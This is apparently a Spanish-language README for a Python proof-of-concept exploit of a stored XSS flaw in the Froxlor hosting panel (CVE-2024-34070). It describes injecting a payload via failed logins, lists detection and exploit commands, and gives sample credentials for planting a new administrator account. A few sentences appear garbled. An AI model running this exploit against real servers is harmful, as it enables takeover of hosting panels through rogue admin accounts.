
Exploit de prueba de concepto para CVE-2024-34070, un XSS almacenado en Froxlor. Detecta instancias vulnerables, extrae la versión e inyecta un payload para crear una cuenta de administrador.
Prueba de concepto en Python para CVE-2024-34070, un problema de XSS almacenado en Froxlor anterior a 2.1.9 a través de intentos de inicio de sesión fallidos escritos en el registro del sistema.
Este proyecto es solo para pruebas de seguridad autorizadas, laboratorios CTF y uso educativo. No lo ejecutes contra sistemas que no poseas o para los que no tengas permiso explícito para realizar pruebas. El modo de explotación puede crear una cuenta de administrador en la instancia objetivo de Froxlor.
< 2.1.9).Detección no autenticada:
python3 main.py --url http://240.0.0.1:8080 --check
Detección autenticada, utilizada para obtener la versión exacta de Froxlor:
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
Modo de explotación, creando un nuevo administrador:
python3 main.py --url http://240.0.0.1:8080 --exploit \
--new-admin abcd \
--new-password 'Abcd@@1234' \
--new-email [email protected]
Si un administrador o un bot de automatización lee los registros del sistema de Froxlor, el paso de verificación debería redirigir eventualmente a admin_index.php.
--check puede confirmar Froxlor pero no puede determinar estrictamente la vulnerabilidad./admin_admins.php) para que funcione contra la instancia objetivo en lugar de un dominio codificado.